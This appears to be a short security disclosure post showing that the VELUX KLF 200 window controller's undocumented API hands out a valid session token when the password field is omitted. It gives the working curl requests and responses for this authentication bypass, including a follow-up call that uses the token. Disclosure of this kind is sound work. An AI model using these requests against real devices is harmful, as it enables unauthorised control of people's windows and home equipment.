Another episode of Internet Of Things done wrong. This exploit is so trivial, i would not even call it exploit.
VELUX[0] is the leading manufacturer of roof windows (They are really great!). VELUX KLF 200 is a device to control VELUX windows over ethernet/internet[1]. The KLF 200 device has an undocumented API for executing scenes, with other words opening and closing velux windows.
Expected behaviour with correct password:
* julius@macbook ~:$ curl 'http://192.168.2.127/api/v1/auth' -X POST -d '{"action":"login","params":{"password":"velux123"}}'
)]}',
{"token":"6XmONGhWRF5Wcu4XrTHZLA==","result":true,"deviceStatus":"IDLE","data":{},"errors":[]}
Expected behaviour with wrong password:
* julius@macbook ~:$ curl 'http://192.168.2.127/api/v1/auth' -X POST -d '{"action":"login","params":{"password":"fnord"}}'
)]}',
{"result":false,"deviceStatus":"IDLE","data":{},"errors":[401]}
Login without password token:
* julius@macbook ~:$ curl 'http://192.168.2.127/api/v1/auth' -X POST -d '{"action":"login"}'
)]}',
{"token":"6XmONGhWRF5Wcu4XrTHZLA==","result":false,"deviceStatus":"IDLE","data":{},"errors":[999]}
... returning a valid token:
* julius@macbook ~:$ curl 'http://192.168.2.127/api/v1/products' -H 'Authorization: Bearer 6XmONGhWRF5Wcu4XrTHZLA==' -X POST -d '{"action":"get"}'
)]}',
{"token":"6XmONGhWRF5Wcu4XrTHZLA==","result":true,"deviceStatus":"IDLE","data":[...],"errors":[]}
I assume this is not expected behaviour
Current version:0.1.1.0.41.0
[0] http://www.velux.com/ [1] http://velcdn.azureedge.net/~/media/marketing/de/dokumente/pdf/produktanleitungen/produktdatenblatt/integra/velux-produktdatenblatt-integra-interface-klf200.pdf?la=de-de
It's pretty much an empty page :|